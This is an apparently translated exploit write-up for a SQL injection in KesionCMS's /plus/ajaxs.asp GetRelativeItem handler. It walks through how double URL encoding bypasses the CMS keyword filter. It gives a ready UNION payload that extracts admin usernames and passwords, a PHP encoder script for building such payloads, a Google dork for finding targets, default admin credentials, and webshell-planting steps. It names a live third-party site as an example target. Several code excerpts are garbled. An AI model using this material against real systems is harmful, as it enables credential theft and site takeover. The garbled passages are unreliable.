KesionCMS 0day: SQL injection in /plus/ajaxs.asp (GetRelativeItem)

Affected versions: KesionCMS v6.0–v7.0, and KesionCMS v7.06 eShop.
 
Origin: this is not a new class of bug. It has the same root cause as the previously disclosed /user/Reg/regajax.asp vulnerability; the identical pattern (keyword filter first, URL-decode afterwards, then string-concatenated SQL) reappears in /plus/ajaxs.asp — only the file differs.
 
File: /plus/ajaxs.asp (excerpt):
 
' /plus/ajaxs.asp -- AJAX dispatcher of KesionCMS (transcribed excerpt).
' NOTE(review): string-literal quotes were lost in transcription, e.g.
' KS.S("Action") and Case "Ctoe"; the text below is not valid VBScript as shown.
' The action name is read through KS.S, i.e. it passes the DelSql keyword
' blacklist (kesion.commoncls.asp) before being dispatched. The request in the
' write-up carries no session, so the endpoint appears to need no login -- confirm.
Dim KS:Set KS=New PublicCls

Dim Action

' Handler selector: KS.S wraps DelSql(...Request("Action")...).
Action=KS.S(Action)

Select Case Action

Case Ctoe CtoE

Case GetTags GetTags

Case GetRelativeItem GetRelativeItem ' vulnerable handler: Key is UnEscape()d AFTER the filter and concatenated into SQL

Case Shop_GetCoupon Shop_GetCoupon

Case Shop_ValidateCoupon Shop_ValidateCoupon

Case Shop_BrandOption Shop_BrandOption

Case Shop_CheckProID Shop_CheckProID

Case GetClassOption GetClassOption

Case GetFieldOption GetFieldOption

Case SpecialSubList SpecialSubList

Case GetArea GetArea

Case GetFunc GetFunc

Case AddFriend AddFriend

Case MessageSave MessageSave

Case CheckMyFriend CheckMyFriend

Case SendMsg SendMsg

Case SearchUser SearchUser

Case CheckLogin CheckLogin

Case relativeDoc relativeDoc

Case getModelType getModelType

Case getDocImage getDocImage

Case checkDocFname checkDocFname

Case addCart addShoppingCart

Case GetPackagePro GetPackagePro

Case GetSupplyContact GetSupplyContact

Case HitsGuangGao HitsGuangGao

Case GetClubBoardOption GetClubBoardOption

Case getclubboard GetClubboard

Case getonlinelist getonlinelist

End Select
 
..snip
 
The vulnerable handler:
 
' Sub GetRelativeItem -- "related items" lookup (transcribed excerpt: the
' closing End Sub is not part of this listing, and string-literal quotes
' were lost in transcription, e.g. KS.S("Key"), Key<>"").
Sub GetRelativeItem() ' vulnerable subroutine starts here

' INJECTION POINT. Order matters: KS.S runs the DelSql keyword blacklist on
' the raw request value, and only THEN is the result UnEscape()-decoded.
' A double-URL-encoded payload (%25XX) therefore reaches the blacklist as
' harmless "%XX" text and is turned into the real characters afterwards.
Dim Key:Key=UnEscape(KS.S(Key))

' Flags selecting which columns to match. KS.G presumably reads a request
' parameter as well -- its definition is not shown here.
Dim Rtitle:rtitle=lcase(KS.G(rtitle))

Dim RKey:Rkey=lcase(KS.G(Rkey))

' Numeric inputs go through KS.ChkClng (presumably a CLng coercion -- not shown).
Dim ChannelID:ChannelID=KS.ChkClng(KS.S(Channelid))

Dim ID:ID=KS.ChkClng(KS.G(ID))

Dim Param,RS,SQL,k,SqlStr

' The only check on Key is that it is non-empty.
If Key<> Then

If (Rtitle=true Or RKey=true) Then

If Rtitle=true Then

' Key is spliced into the LIKE pattern by string concatenation, with no
' quoting or parameterisation -- SQL injection.
param=Param & title like %& key & %

end if

If Rkey=true Then

If Param= Then

Param=Param &  keywords like % & key & %

Else

Param=Param &  or keywords like % & key & %

End If

End If

Else

' Default branch when neither flag is set: Key still reaches the query.
Param=Param &  keywords like % & key & %

End If

End If

If Param<> Then

Param= where InfoID<> & id &  and ( & param & )

else

Param= where InfoID<> & id

end if

If ChannelID<>0 Then Param=Param &  and ChannelID= & ChannelID

Param=Param & and verific=1

' Final query. It selects three columns, which is why the write-up's UNION
' payload supplies exactly three (1,2,username+'|'+password).
SqlStr=Select top 30 ChannelID,InfoID,Title From KS_ItemInfo & Param & order by id desc

' Executed verbatim against the shared connection.
Set RS=Server.CreateObject(ADODB.RECORDSET)

RS.Open SqlStr,conn,1,1

If Not RS.Eof Then

SQL=RS.GetRows(-1)

End If

RS.Close
 
Look at `Dim Key:Key=UnEscape(KS.S("Key"))`: KS.S is Kesion's own filter function, and its result is passed through UnEscape() afterwards — the value is URL-decoded only after it has been filtered.
So let's look at the original definition of the filter in /KS_Cls/kesion.commoncls.asp:
 
' DelSql -- keyword blacklist applied by KS.S to every request value.
' Returns Str unchanged when nothing matches; otherwise Die (defined
' elsewhere, not shown) aborts the response with a JavaScript alert.
' NOTE(review): the quotes around the keyword string and the "|" separator
' were lost in transcription.
Function DelSql(Str)

Dim SplitSqlStr,SplitSqlArr,I

' Blacklist terms. Points a reviewer should note:
' - several entries carry a trailing space ("and ", "or ", "set ", "count "),
'   so the same keyword followed by a tab, newline, comment or parenthesis
'   is not matched;
' - only literal text is checked, never URL-/%-encoded forms, and
'   GetRelativeItem UnEscape()s the value AFTER this check;
' - substring matching produces false positives ("charity" contains "char",
'   "middle" contains "mid").
SplitSqlStr=dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell

SplitSqlArr = Split(SplitSqlStr,|)

For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)

' Case-insensitive substring test against each term.
If Instr(LCase(Str),SplitSqlArr(I))>0 Then

' Garbled in transcription: a JS alert naming the matched term, the client IP and the time, then window.close().
Die <script>alert(ϵͳ棡\n\n1ύжַ& SplitSqlArr(I) &;\n2Ѿ¼;\n3IP&GetIP&;\n4ڣ&Now&;\n Powered By Kesion.Com!);window.close();</script>

End if

Next

' No match: the value is returned untouched (no escaping, no encoding).
DelSql = Str

End Function
 
Reads a parameter value from Request (QueryString / Form):
 
Public Function S(Str)
 
S = DelSql(Replace(Replace(Request(Str), , ), , )) // NOTE: the arguments of both Replace() calls were lost in transcription. The essential point: filtering (DelSql) happens here, BEFORE the caller UnEscape()-decodes the value, and the keyword list covers neither URL-encoded nor %uXXXX-encoded forms. A quote written as %2527 (double-encoded) therefore slips past the blacklist and is restored to ' afterwards — the same double-decoding bypass well known from PHP applications.
 
Now back to the dispatcher in /plus/ajaxs.asp:
 
Dim KS:Set KS=New PublicCls
 
Dim Action
 
Action=KS.S(Action)
 
Select Case Action
 
Case Ctoe CtoE
 
Case GetTags GetTags
 
Case GetRelativeItem GetRelativeItem
 
When action=GetRelativeItem the dispatcher enters GetRelativeItem, which only checks that key is non-empty, so any value reaches the query. From here conqu3r's approach is simple: a direct UNION-based injection.
 
Payload (as recovered by decoding the request below): `%') union select 1,2,username+'|'+password from KS_Admin` followed by a NUL byte. Double-URL-encode it with the script at the end of this post and pass the result as key=.
 
/plus/ajaxs.asp?action=GetRelativeItem&key=conqu3r%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
 
On the MSSQL edition, if the database account has sufficient privileges, the injection can likely be escalated further (e.g. command execution through stored procedures), since the keyword filter — including its xp_cmdshell entry — is bypassed entirely by double encoding.
 
˴©CLngת·
 

 
/plus/ajaxs.asp?action=GetRelativeItem&key=%25
 
Google dork: intext:Powered By KesionCMS
 
Default admin backend: /admin/login.asp; default verification code: 8888.
 
Getting a webshell from the backend:
 
1. Via SQL execution: write a one-line ASP backdoor into the Access database file (the "Access one-sentence trojan" technique).
 
2. Via database backup: back up the database to a file containing the one-liner (backup-to-.asp).
 
Example (live target quoted in the original post): http://www.allvison.com//plus/ajaxs.asp?action=GetRelativeItem&key=conqu3r%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
 
Encoder:
 
[code]
 
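<?php
// Double-URL-encodes a SQL payload for the KesionCMS /plus/ajaxs.asp
// GetRelativeItem injection. The server decodes the parameter once when
// parsing the request and once more via UnEscape() after the DelSql keyword
// filter has run, so every byte is emitted as %25XX (-> %XX -> the byte).
error_reporting(E_ERROR);
set_time_limit(0);

/**
 * Double-URL-encode every byte of $payload and append a double-encoded
 * NUL (%2500), which truncates the remainder of the server-side query once
 * the decoded string reaches the database driver.
 *
 * @param string $payload raw SQL fragment, e.g. "%') union select ..."
 * @return string the value to send as the key= parameter
 */
function kesion_double_encode($payload)
{
    $out = '';
    $len = strlen($payload);
    for ($i = 0; $i < $len; $i++) {
        // %02x keeps bytes below 0x10 two digits wide; the original
        // base_convert() emitted a single digit for them (e.g. "%251"),
        // which the server would not decode.
        $out .= sprintf('%%25%02x', ord($payload[$i]));
    }
    // Explicit trailing NUL. The original produced it by accident: the loop
    // ran one index past the end (ord('') === 0 -> "%250") and a stray "0"
    // was appended afterwards.
    return $out . '%2500';
}

// Command-line entry point; skipped when this file is merely included.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    print_r('
================================================================================
kesioncms ת
------by conqu3r
================================================================================
');

    if ($argc < 2) {
        print_r('
================================================================================
Usage: php ' . $argv[0] . ' "sql code";

Example:
php ' . $argv[0] . ' "\'%) union select...";
================================================================================
');
        die;
    }

    echo kesion_double_encode($argv[1]);
}
?>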
